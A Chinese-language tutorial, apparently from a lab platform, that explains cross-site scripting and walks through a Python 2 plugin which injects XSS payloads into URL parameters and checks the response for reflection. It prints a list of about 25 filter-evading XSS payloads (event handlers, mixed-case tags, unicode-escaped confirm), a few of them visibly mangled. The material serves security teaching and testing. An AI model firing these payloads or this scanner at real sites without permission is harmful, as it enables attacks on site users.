本节会基于上节开发的插件框架,讲解xss漏洞形成的原理,据此编写一个简单的XSS检测插件,先上效果图。
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
但是大家不要高兴的太早,我们这篇xss检测程序是很原始很初级的自动化检测,只能检测一部分xss漏洞,但没关系,我们先做出雏形,在后期维护的时候慢慢增强这个功能。
在上节中,我们基于爬虫系统开发出了插件系统,这个系统会非常方便的把爬取出来的链接传递到插件系统中,我们只需要一个框架:
import re,random
from lib.core import Download
class spider:
def run(self,url,html):
pass
然后将运行函数写到run函数里面就可以了,url,html是插件系统传递过来的链接和链接的网页源码。
我们这里先做个很简单的xss原理检测工具,也很简单,就是通过一些xss的payload加入到url参数中,然后查找url的源码中是否存在这个参数,存在则可以证明页面存在xss漏洞了。
payload list:
</script>"><script>prompt(1)</script>
</ScRiPt>"><ScRiPt>prompt(1)</ScRiPt>
"><img src=x onerror=prompt(1)>
"><svg/onload=prompt(1)>
"><iframe/src=javascript:prompt(1)>
"><h1 onclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
">:confirm%28 1%29">Clickme</a>
">:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
"><textarea autofocus onfocus=prompt(1)>
"><a/href=javascript:co\u006efir\u006d("1")>clickme
"><script>co\u006efir\u006d`1`</script>
"><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
"><img src=x onerror=co\u006efir\u006d`1`>
"><svg/onload=co\u006efir\u006d`1`>
"><iframe/src=javascript:co\u006efir\u006d%28 1%29>
"><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
"><a href=javascript:prompt%28 1%29>Clickme</a>
">:co\u006efir\u006d%28 1%29">Clickme</a>
"><textarea autofocus onfocus=co\u006efir\u006d(1)>
"><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
"><img/src=x%0Aonerror=prompt`1`>
">lt;img src=x:x onerror=alert(1)>">
"><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>
答:xss原理是把输入的代码当作html执行了,执行了就会在网页源码中显示,所以我们查找就行。
错,xss有各种各样的玩法,本文只是一个简单的工具,用作抛砖引玉。
为了以后代码编写的方便,我们编写一个函数取出url中的参数, 比如https://www.shiyanlou.com/courses/?a=1&b=2&c=3
。 我们要将 1 2 3 都取出来进行替换,所以我们先创建一个公共函数来分割这些文本。
在文件 lib/core/common.py
中
def urlsplit(url):
domain = url.split("?")[0]
_url = url.split("?")[-1]
pararm = {}
for val in _url.split("&"):
pararm[val.split("=")[0]] = val.split("=")[-1]
#combine
urls = []
for val in pararm.values():
new_url = domain + '?' + _url.replace(val,'my_Payload')
urls.append(new_url)
return urls
这个函数会返回一个元祖将每个参数用my_Payload标记,到时候我们替换这个参数就行了。
然后编写我们的xss检查程序,这个程序也是一个基于爬虫的框架。
开始之前现在目录新建一个data文件夹,这个文件夹用于存储我们的一些数据。 然后把xss payload放入进入,命名的话随意,这里我就命名为xss.txt, 内容为之前的xss payload list。
在script
目录下新建文件xss_check.py
。 代码如下:
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from lib.core import Download,common
import sys,os
payload = []
filename = os.path.join(sys.path[0],"data","xss.txt")
f = open(filename)
for i in f:
payload.append(i.strip())
class spider():
def run(self,url,html):
download = Download.Downloader()
urls = common.urlsplit(url)
if urls is None:
return False
for _urlp in urls:
for _payload in payload:
_url = _urlp.replace("my_Payload",_payload)
print "[xss test]:",_url
#我们需要对URL每个参数进行拆分,测试
_str = download.get(_url)
if _str is None:
return False
if(_str.find(_payload)!=-1):
print "xss found:%s"%url
return False
效果图:
payload = []
filename = os.path.join(sys.path[0],"data","xss.txt")
f = open(filename)
for i in f:
payload.append(i.strip())
这行代码主要实现了读取我们的xsspayload文件。
因为文件是在windows下生成的,所以我们要对每行用strip()
过滤下\n
空格等的特殊符号。接下来的代码就是xss检测的运行流程了,获取到url
,拆分url
,对每个url
拆分参数进入注入分析,成功就返回出来。一个很简单的思路。
GitHub源码地址:https://github.com/ldz0/Python-wgdscan/tree/master/(三)基于爬虫开发XSS检测程序-代码/wgdscan
实验来自实验楼